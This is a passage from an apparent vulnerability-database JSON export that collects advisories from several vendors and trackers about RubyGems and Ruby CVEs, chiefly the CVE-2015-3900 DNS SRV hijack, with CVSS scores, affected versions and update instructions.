"PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2023-08-25T22:50:12", "id": "OSV:GHSA-WP3J-RVFP-624H", "href": "https://osv.dev/vulnerability/GHSA-wp3j-rvfp-624h", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-05-04T21:41:09", "description": "RubyGems 2.0.x before 2.0.17, 2.2.x before 2.2.5, and 2.3.x before 2.4.8 does not validate the hostname when fetching gems or making API requests, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record with a domain that is suffixed with the original domain name, aka a \"DNS hijack attack.\"\n\nNOTE: this vulnerability exists because of an incomplete fix for CVE-2015-3900.", "cvss3": {}, "published": "2022-05-17T00:16:50", "type": "osv", "title": "RubyGems Improper Input Validation vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2023-05-04T21:41:05", "id": "OSV:GHSA-QV62-XFJ6-32XM", "href": "https://osv.dev/vulnerability/GHSA-qv62-xfj6-32xm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-28T06:20:49", "description": "\nSeveral vulnerabilities were discovered in Ruby 2.1.\n\n\n* [CVE-2016-2337](https://security-tracker.debian.org/tracker/CVE-2016-2337)\nType confusion exists in \\_cancel\\_eval Ruby's TclTkIp class\n method. Attacker passing different type of object than String as\n retval argument can cause arbitrary code execution.\n* [CVE-2018-1000073](https://security-tracker.debian.org/tracker/CVE-2018-1000073)\nRubyGems contains a Directory Traversal vulnerability in\n install\\_location function of package.rb that can result in path\n traversal when writing to a symlinked basedir outside of the root.\n* [CVE-2018-1000074](https://security-tracker.debian.org/tracker/CVE-2018-1000074)\nRubyGems contains a Deserialization of Untrusted Data\n vulnerability in owner command that can result in code\n execution. This attack appear to be exploitable via victim must\n run the gem owner command on a gem with a specially crafted YAML\n file.\n\n\nFor Debian 8 Jessie, these problems have been fixed in version\n2.1.5-2+deb8u5.\n\n\nWe recommend that you upgrade your ruby2.1 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-27T00:00:00", "type": "osv", "title": "ruby2.1 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2337", "CVE-2018-1000073", "CVE-2018-1000074"], "modified": "2023-06-28T06:20:44", "id": "OSV:DLA-1480-1", "href": "https://osv.dev/vulnerability/DLA-1480-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-28T06:20:46", "description": "\nMultiple vulnerabilities were found in the interpreter for the Ruby\nlanguage. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues:\n\n\n* [CVE-2015-9096](https://security-tracker.debian.org/tracker/CVE-2015-9096)\nSMTP command injection in Net::SMTP via CRLF sequences in a RCPT TO\n or MAIL FROM command.\n* [CVE-2016-2339](https://security-tracker.debian.org/tracker/CVE-2016-2339)\nExploitable heap overflow in Fiddle::Function.new.\n* [CVE-2016-7798](https://security-tracker.debian.org/tracker/CVE-2016-7798)\nIncorrect handling of initialization vector in the GCM mode in the\n OpenSSL extension.\n* [CVE-2017-0898](https://security-tracker.debian.org/tracker/CVE-2017-0898)\nBuffer underrun vulnerability in Kernel.sprintf.\n* [CVE-2017-0899](https://security-tracker.debian.org/tracker/CVE-2017-0899)\nANSI escape sequence vulnerability in RubyGems.\n* [CVE-2017-0900](https://security-tracker.debian.org/tracker/CVE-2017-0900)\nDoS vulnerability in the RubyGems query command.\n* [CVE-2017-0901](https://security-tracker.debian.org/tracker/CVE-2017-0901)\ngem installer allowed a malicious gem to overwrite arbitrary files.\n* [CVE-2017-0902](https://security-tracker.debian.org/tracker/CVE-2017-0902)\nRubyGems DNS request hijacking vulnerability.\n* [CVE-2017-0903](https://security-tracker.debian.org/tracker/CVE-2017-0903)\nMax Justicz reported that RubyGems is prone to an unsafe object\n deserialization vulnerability. When parsed by an application which\n processes gems, a specially crafted YAML formatted gem specification\n can lead to remote code execution.\n* [CVE-2017-10784](https://security-tracker.debian.org/tracker/CVE-2017-10784)\nYusuke Endoh discovered an escape sequence injection vulnerability in\n the Basic authentication of WEBrick. An attacker can take advantage of\n this flaw to inject malicious escape sequences to the WEBrick log and\n potentially execute control characters on the victim's terminal\n emulator when reading logs.\n* [CVE-2017-14033](https://security-tracker.debian.org/tracker/CVE-2017-14033)\nasac reported a buffer underrun vulnerability in the OpenSSL\n extension. A remote attacker could take advantage of this flaw to\n cause the Ruby interpreter to crash leading to a denial of service.\n* [CVE-2017-14064](https://security-tracker.debian.org/tracker/CVE-2017-14064)\nHeap memory disclosure in the JSON library.\n* [CVE-2017-17405](https://security-tracker.debian.org/tracker/CVE-2017-17405)\nA command injection vulnerability in Net::FTP might allow a\n malicious FTP server to execute arbitrary commands.\n* [CVE-2017-17742](https://security-tracker.debian.org/tracker/CVE-2017-17742)\nAaron Patterson reported that WEBrick bundled with Ruby was vulnerable\n to an HTTP response splitting vulnerability. It was possible for an\n attacker to inject fake HTTP responses if a script accepted an\n external input and output it without modifications.\n* [CVE-2017-17790](https://security-tracker.debian.org/tracker/CVE-2017-17790)\nA command injection vulnerability in lib/resolv.rb's lazy\\_initialze\n might allow a command injection attack. However untrusted input to\n this function is rather unlikely.\n* [CVE-2018-6914](https://security-tracker.debian.org/tracker/CVE-2018-6914)\nooooooo\\_q discovered a directory traversal vulnerability in the\n Dir.mktmpdir method in the tmpdir library. It made it possible for\n attackers to create arbitrary directories or files via a .. (dot dot)\n in the prefix argument.\n* [CVE-2018-8777](https://security-tracker.debian.org/tracker/CVE-2018-8777)\nEric Wong reported an out-of-memory DoS vulnerability related to a\n large request in WEBrick bundled with Ruby.\n* [CVE-2018-8778](https://security-tracker.debian.org/tracker/CVE-2018-8778)\naerodudrizzt found a buffer under-read vulnerability in the Ruby\n String#unpack method. If a big number was passed with the specifier @,\n the number was treated as a negative value, and an out-of-buffer read\n occurred. Attackers could read data on heaps if an script accepts an\n external input as the argument of String#unpack.\n* [CVE-2018-8779](https://security-tracker.debian.org/tracker/CVE-2018-8779)\nooooooo\\_q reported that the UNIXServer.open and UNIXSocket.open\n methods of the socket library bundled with Ruby did not check for NUL\n bytes in the path argument. The lack of check made the methods\n vulnerable to unintentional socket creation and unintentional socket\n access.\n* [CVE-2018-8780](https://security-tracker.debian.org/tracker/CVE-2018-8780)\nooooooo\\_q discovered an unintentional directory traversal in\n some methods in Dir, by the lack of checking for NUL bytes in their\n parameter.\n* [CVE-2018-1000075](https://security-tracker.debian.org/tracker/CVE-2018-1000075)\nA negative size vulnerability in ruby gem package tar header that could\n cause an infinite loop.\n* [CVE-2018-1000076](https://security-tracker.debian.org/tracker/CVE-2018-1000076)\nRubyGems package improperly verifies cryptographic signatures. A mis-signed\n gem could be installed if the tarball contains multiple gem signatures.\n* [CVE-2018-1000077](https://security-tracker.debian.org/tracker/CVE-2018-1000077)\nAn improper input validation vulnerability in RubyGems specification\n homepage attribute could allow malicious gem to set an invalid homepage\n URL.\n* [CVE-2018-1000078](https://security-tracker.debian.org/tracker/CVE-2018-1000078)\nCross Site Scripting (XSS) vulnerability in gem server display of homepage\n attribute.\n* [CVE-2018-1000079](https://security-tracker.debian.org/tracker/CVE-2018-1000079)\nPath Traversal vulnerability during gem installation.\n\n\nFor Debian 8 Jessie, these problems have been fixed in version\n2.1.5-2+deb8u4.\n\n\nWe recommend that you upgrade your ruby2.1 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-14T00:00:00", "type": "osv", "title": "ruby2.1 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9096", "CVE-2016-2339", "CVE-2016-7798", "CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-17405", "CVE-2017-17742", "CVE-2017-17790", "CVE-2018-1000075", "CVE-2018-1000076", "CVE-2018-1000077", "CVE-2018-1000078", "CVE-2018-1000079", "CVE-2018-6914", "CVE-2018-8777", "CVE-2018-8778", "CVE-2018-8779", "CVE-2018-8780"], "modified": "2023-06-28T06:20:41", "id": "OSV:DLA-1421-1", "href": "https://osv.dev/vulnerability/DLA-1421-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:56:42", "description": "RubyGems make life easier for developers to distribute software to users. A vulnerability in the Ruby package manager could make life easier for hackers to redirect victims to trouble.\n\nDisclosed today by researchers at Trustwave and OpenDNS, the vulnerability, CVE-2015-3900, enables an attacker to [redirect a RubyGem client](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Attacking-Ruby-Gem-Security-with-CVE-2015-3900/>) to a gem server controlled by the attacker where additional malware or exploits can be executed.\n\nThe problem is noteworthy on several fronts. One in particular surfaces when clients using HTTPS can also be redirected, bypassing HTTPS verification on the original gem source.\n\n\u201cThis means that the attacker can force the user to install malicious/trojaned gems,\u201d researchers at Trustwave said.\n\nAdditional trouble was found via the RubyGems Gem Server Discovery feature that uses a DNS SRV request in order to find gem servers.\n\n\u201cThis functionality does not require that DNS replies come from the same security domain as the original gem source, allowing arbitrary redirection to attacker controlled gem servers,\u201d Trustwave said, adding that proof of concept Gem Trojaning service written by its researchers exploits the vulnerability and transparently turns a RubyGem into a Trojan as a user installs it.\n\nTrustwave, in collaboration with OpenDNS, estimates that more than a million software installations daily could be affected, extrapolating out to 438 million annually.\n\nRubyGems\u2019 maintainers have fixed the issue, but users must upgrade RubyGem clients in all Ruby environments to 2.4.8 or higher.\n\nThe breadth of those affected by the vulnerability is also going to give birth to debates over whether gems should be signed. Trustwave said that none of the top 10 gems are signed, and that [list](<https://rubygems.org/stats>) includes rake, rack, json and rails.\n\n\u201cRuby gem signing is an obvious mitigation strategy for the above mentioned transport security issues. However, gem signing is barely used in the Ruby gem ecosystem,\u201d Trustwave said. \u201cWe demonstrated that even if you are using signed gems, by using CVE-2015-3900, you must be using the HighSecurity trust policy or gems can still be trojaned in transit due to a signing downgrade attack.\u201d\n\nRubyGems are used in Ruby libraries and applications. It\u2019s a standard packaging format used by developers to build and distribute software. Once the vulnerability was patched, Trustwave said it identified an additional bypass that an attacker can use to redirect users to a domain that ends with the original security domain; Trustwave provided the example: attackercontrolledrubygems.org.\n\n\u201cThese issues affect the RubyGems client and any environment that embeds the RubyGems client. Ruby, JRuby, and Rubinuius have all been confirmed to embed the RubyGems client and are affected by CVE-2015-3900,\u201d Trustwave said. \u201cThe mechanism for updating to a fixed version of RubyGems also uses the same vulnerable functionality we\u2019re trying to protect.\u201d\n", "cvss3": {}, "published": "2015-06-23T09:55:51", "type": "threatpost", "title": "RubyGems Patches Serious Redirection Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-3900"], "modified": "2015-06-25T21:13:32", "id": "THREATPOST:47105F0F1A3DAF664EEDC82B887B86A7", "href": "https://threatpost.com/rubygems-patches-serious-redirection-vulnerability/113425/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "veracode": [{"lastseen": "2023-04-18T13:58:03", "description": "ruby is vulnerable to man-in-the-middle attack. A flaw was found in a way rubygems verified the API endpoint hostname retrieved through a DNS SRV record. A man-in-the-middle attacker could use this flaw to force a client to download content from an untrusted domain.\n", "cvss3": {}, "published": "2019-01-15T09:07:12", "type": "veracode", "title": "Man-in-the-Middle (MitM)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2019-05-15T06:18:13", "id": "VERACODE:11752", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-11752/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "github": [{"lastseen": "2023-09-17T01:09:24", "description": "RubyGems 2.0.x before 2.0.16, 2.2.x before 2.2.4, and 2.4.x before 2.4.7 does not validate the hostname when fetching gems or making API requests, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record, aka a \"DNS hijack attack.\"", "cvss3": {}, "published": "2022-05-14T01:08:49", "type": "github", "title": "RubyGems vulnerable to DNS hijack attack", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2023-08-25T22:31:50", "id": "GHSA-WP3J-RVFP-624H", "href": "https://github.com/advisories/GHSA-wp3j-rvfp-624h", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-17T01:06:07", "description": "RubyGems 2.0.x before 2.0.17, 2.2.x before 2.2.5, and 2.3.x before 2.4.8 does not validate the hostname when fetching gems or making API requests, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record with a domain that is suffixed with the original domain name, aka a \"DNS hijack attack.\"\n\nNOTE: this vulnerability exists because of an incomplete fix for CVE-2015-3900.", "cvss3": {}, "published": "2022-05-17T00:16:50", "type": "github", "title": "RubyGems Improper Input Validation vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2023-05-04T21:14:41", "id": "GHSA-QV62-XFJ6-32XM", "href": "https://github.com/advisories/GHSA-qv62-xfj6-32xm", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2023-09-21T20:59:02", "description": "\n\nJonathan Claudius reports:\n\nRubyGems provides the ability of a domain to direct clients to a\n\t separate host that is used to fetch gems and make API calls against.\n\t This mechanism is implemented via DNS, specifically a SRV record\n\t _rubygems._tcp under the original requested domain.\nRubyGems did not validate the hostname returned in the SRV record\n\t before sending requests to it. This left clients open to a DNS\n\t hijack attack, whereby an attacker could return a SRV of their\n\t choosing and get the client to use it.\n\n\n", "cvss3": {}, "published": "2015-05-14T00:00:00", "type": "freebsd", "title": "rubygems -- request hijacking vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2015-05-14T00:00:00", "id": "A0089E18-FC9E-11E4-BC58-001E67150279", "href": "https://vuxml.freebsd.org/freebsd/a0089e18-fc9e-11e4-bc58-001e67150279.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "ubuntu": [{"lastseen": "2023-09-18T02:58:45", "description": "## Releases\n\n * Ubuntu 17.04 \n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * ruby1.9.1 \\- Object-oriented scripting language\n * ruby2.0 \\- Object-oriented scripting language\n * ruby2.3 \\- Object-oriented scripting language\n\nIt was discovered that Ruby DL::dlopen incorrectly handled opening \nlibraries. An attacker could possibly use this issue to open libraries with \ntainted names. This issue only applied to Ubuntu 14.04 LTS. (CVE-2009-5147)\n\nTony Arcieri, Jeffrey Walton, and Steffan Ullrich discovered that the Ruby \nOpenSSL extension incorrectly handled hostname wildcard matching. This \nissue only applied to Ubuntu 14.04 LTS. (CVE-2015-1855)\n\nChristian Hofstaedtler discovered that Ruby Fiddle::Handle incorrectly \nhandled certain crafted strings. An attacker could use this issue to cause \na denial of service, or possibly execute arbitrary code. This issue only \napplied to Ubuntu 14.04 LTS. (CVE-2015-7551)\n\nIt was discovered that Ruby Net::SMTP incorrectly handled CRLF sequences. A \nremote attacker could possibly use this issue to inject SMTP commands. \n(CVE-2015-9096)\n\nMarcin Noga discovered that Ruby incorrectly handled certain arguments in \na TclTkIp class method. An attacker could possibly use this issue to \nexecute arbitrary code. This issue only affected Ubuntu 14.04 LTS. \n(CVE-2016-2337)\n\nIt was discovered that Ruby Fiddle::Function.new incorrectly handled \ncertain arguments. An attacker could possibly use this issue to execute \narbitrary code. This issue only affected Ubuntu 14.04 LTS. (CVE-2016-2339)\n\nIt was discovered that Ruby incorrectly handled the initialization vector \n(IV) in GCM mode. An attacker could possibly use this issue to bypass \nencryption. (CVE-2016-7798)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-25T00:00:00", "type": "ubuntu", "title": "Ruby vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5147", "CVE-2015-1855", "CVE-2015-7551", "CVE-2015-9096", "CVE-2016-2337", "CVE-2016-2339", "CVE-2016-7798"], "modified": "2017-07-25T00:00:00", "id": "USN-3365-1", "href": "https://ubuntu.com/security/notices/USN-3365-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rubygems": [{"lastseen": "2023-05-16T15:02:04", "description": "RubyGems 2.0.x before 2.0.16, 2.2.x before 2.2.4, and 2.4.x before 2.4.7\ndoes not validate the hostname when fetching gems or making API requests, which\nallows remote attackers to redirect requests to arbitrary domains via a crafted\nDNS SRV record, aka a \"DNS hijack attack.\" A flaw was found in a way rubygems verified\nthe API endpoint hostname retrieved through a DNS SRV record. A man-in-the-middle\nattacker could use this flaw to force a client to download content from an untrusted\ndomain.\n", "cvss3": {}, "published": "2015-05-14T00:00:00", "type": "rubygems", "title": "CVE-2015-3900 rubygems: DNS hijacking vulnerability in api_endpoint()", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2015-3900", "CVE-2015-3900"], "modified": "2015-05-14T00:00:00", "id": "RUBY:RUBYGEMS-UPDATE-2015-3900-122162", "href": "https://rubysec.com/advisories/2015-3900/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-04-21T02:33:22", "description": "RubyGems contains a flaw in the api_endpoint() function in remote_fetcher.rb\nthat is triggered when handling hostnames in SRV records. With a specially\ncrafted response, a context-dependent attacker may conduct DNS hijacking\nattacks. This vulnerability is due to an incomplete fix for CVE-2015-3900,\nwhich allowed redirection to an arbitrary gem server in any security domain.\n", "cvss3": {}, "published": "2015-06-08T00:00:00", "type": "rubygems", "title": "RubyGems remote_fetcher.rb api_endpoint() Function Missing SRV Record Hostname Validation Request Hijacking", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2015-4020", "CVE-2015-3900"], "modified": "2015-06-08T00:00:00", "id": "RUBY:RUBYGEMS-UPDATE-2015-4020", "href": "https://rubysec.com/advisories/2015-4020/", "cvss": {"score": 0.0, "vector": "NONE"}}], "amazon": [{"lastseen": "2023-09-21T19:12:26", "description": "**Issue Overview:**\n\nRubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against. This mechanism is implemented via DNS, specificly a SRV record _rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. (CVE-2015-3900)\n\nAs discussed upstream (https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-009/?fid=6478), CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.\n\n \n**Affected Packages:** \n\n\nruby21\n\n \n**Issue Correction:** \nRun _yum update ruby21_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 ruby21-devel-2.1.6-1.17.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby21-libs-2.1.6-1.17.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby21-2.1.6-1.17.amzn1.i686 \n \u00a0\u00a0\u00a0 rubygem21-bigdecimal-1.2.4-1.17.amzn1.i686 \n \u00a0\u00a0\u00a0 rubygem21-io-console-0.4.3-1.17.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby21-debuginfo-2.1.6-1.17.amzn1.i686 \n \u00a0\u00a0\u00a0 rubygem21-psych-2.0.5-1.17.amzn1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 rubygems21-2.2.3-1.17.amzn1.noarch \n \u00a0\u00a0\u00a0 rubygems21-devel-2.2.3-1.17.amzn1.noarch \n \u00a0\u00a0\u00a0 ruby21-doc-2.1.6-1.17.amzn1.noarch \n \u00a0\u00a0\u00a0 ruby21-irb-2.1.6-1.17.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 ruby21-2.1.6-1.17.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 ruby21-libs-2.1.6-1.17.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem21-bigdecimal-1.2.4-1.17.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby21-debuginfo-2.1.6-1.17.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby21-devel-2.1.6-1.17.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem21-psych-2.0.5-1.17.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby21-2.1.6-1.17.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem21-io-console-0.4.3-1.17.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2015-3900](<https://access.redhat.com/security/cve/CVE-2015-3900>), [CVE-2015-4020](<https://access.redhat.com/security/cve/CVE-2015-4020>)\n\nMitre: [CVE-2015-3900](<https://vulners.com/cve/CVE-2015-3900>), [CVE-2015-4020](<https://vulners.com/cve/CVE-2015-4020>)\n", "cvss3": {}, "published": "2015-06-16T10:30:00", "type": "amazon", "title": "Medium: ruby21", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2015-06-18T20:44:00", "id": "ALAS-2015-548", "href": "https://alas.aws.amazon.com/ALAS-2015-548.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-21T19:12:52", "description": "**Issue Overview:**\n\nRubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against. This mechanism is implemented via DNS, specificly a SRV record _rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. (CVE-2015-3900)\n\nAs discussed upstream (https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-009/?fid=6478), CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.\n\n \n**Affected Packages:** \n\n\nruby20\n\n \n**Issue Correction:** \nRun _yum update ruby20_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 ruby20-2.0.0.645-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby20-devel-2.0.0.645-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby20-debuginfo-2.0.0.645-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 rubygem20-io-console-0.4.2-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 rubygem20-bigdecimal-1.2.0-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby20-libs-2.0.0.645-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 rubygem20-psych-2.0.0-1.27.amzn1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 rubygems20-devel-2.0.14-1.27.amzn1.noarch \n \u00a0\u00a0\u00a0 rubygems20-2.0.14-1.27.amzn1.noarch \n \u00a0\u00a0\u00a0 ruby20-irb-2.0.0.645-1.27.amzn1.noarch \n \u00a0\u00a0\u00a0 ruby20-doc-2.0.0.645-1.27.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 ruby20-2.0.0.645-1.27.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 ruby20-debuginfo-2.0.0.645-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 